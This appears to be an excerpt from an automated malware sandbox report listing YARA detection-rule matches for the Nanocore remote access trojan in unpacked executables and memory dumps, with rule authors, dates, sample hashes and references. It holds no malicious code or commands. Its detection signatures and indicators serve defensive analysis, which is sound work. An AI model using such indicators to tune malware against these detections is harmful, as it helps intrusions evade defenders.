Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
